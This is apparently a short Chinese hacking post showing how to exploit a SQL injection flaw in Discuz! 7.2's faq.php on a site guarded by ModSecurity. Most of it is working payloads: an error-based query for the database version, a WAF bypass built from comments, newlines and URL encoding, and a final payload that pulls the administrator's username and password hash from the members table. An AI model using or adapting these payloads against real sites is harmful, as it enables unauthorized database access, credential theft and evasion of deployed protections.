最近在玩dz7.2注入漏洞,遇到一部署modsecurity防火墙站点,表示人品不给力,简单绕过思路如下
获取数据库版本:
faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema .tables group by x)a)%23
想继续射只能绕过了。大家都知道Modsecurity是开源waf,可以本地装个研究下规则库。常规的绕过思路肯定都是不行的,空格、加号、大小写、/**/、sele/**/ct、各种编码等。Modsecutiry规则通常还是过滤关键字,或者过滤组合关键字,如下图:
and (select 1 from (select
and+(select/**/1+from+(select cOUnt
通过不断尝试,这里主要过滤select count以及select concat关键字组合。
这里可以采用回车换行+注释,再经过url编码绕过思路。
Select#foo*/*bar count()
编码过:
select%23foo*%2F*bar%0D%0Acount() //回车换行url编码%0D%0A
替换后的payload
and (select 1/*ddd*/from/*da*/(select%23foo*%2F*bar%0D%0Acount(*),/**/concat%23foo*%2F*bar%0D%0A%28/**/user(),/**/floor(rand(0)*2))x from/**/information_schema.tables group by x)a)%23
获取管理员密码:
and (select 1 from (select%23foo*%2F*bar%0D%0Acount(*),concat%23foo*%2F*bar%0D%0A((select/**/(select(select%23foo*%2F*bar%0D%0Aconcat%23foo*%2F*bar%0D%0A%28username,0x27,password) from cdb_members limit 1) ) from %23foo*%2F*bar%0D%0A`information_schema`.tables limit 0,1),floor(rand(0)*2))x from %23foo*%2F*bar%0D%0Ainformation_schema.tables group by x)a)%23
其他可以自行构造了。